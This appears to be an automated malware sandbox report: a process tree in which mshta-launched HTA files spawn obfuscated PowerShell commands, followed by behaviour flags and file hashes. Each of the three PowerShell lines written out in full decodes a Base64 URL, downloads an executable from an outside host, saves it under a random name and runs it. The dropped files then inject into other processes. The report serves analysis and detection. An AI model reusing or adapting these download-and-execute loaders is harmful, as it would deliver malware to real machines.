C:\Users\Public\xbu.exe"C:\Users\Public\xbu.exe"5⤵
- Executes dropped EXE
PID:5052 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:504 -
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:1520 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Users\Public\xpj.exe"C:\Users\Public\xpj.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4460 -
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"7⤵
- Executes dropped EXE
PID:4792 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
MD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1a6923da95705fb81e368ae48f93d28522ef552fb
SHA2561989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA5120d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5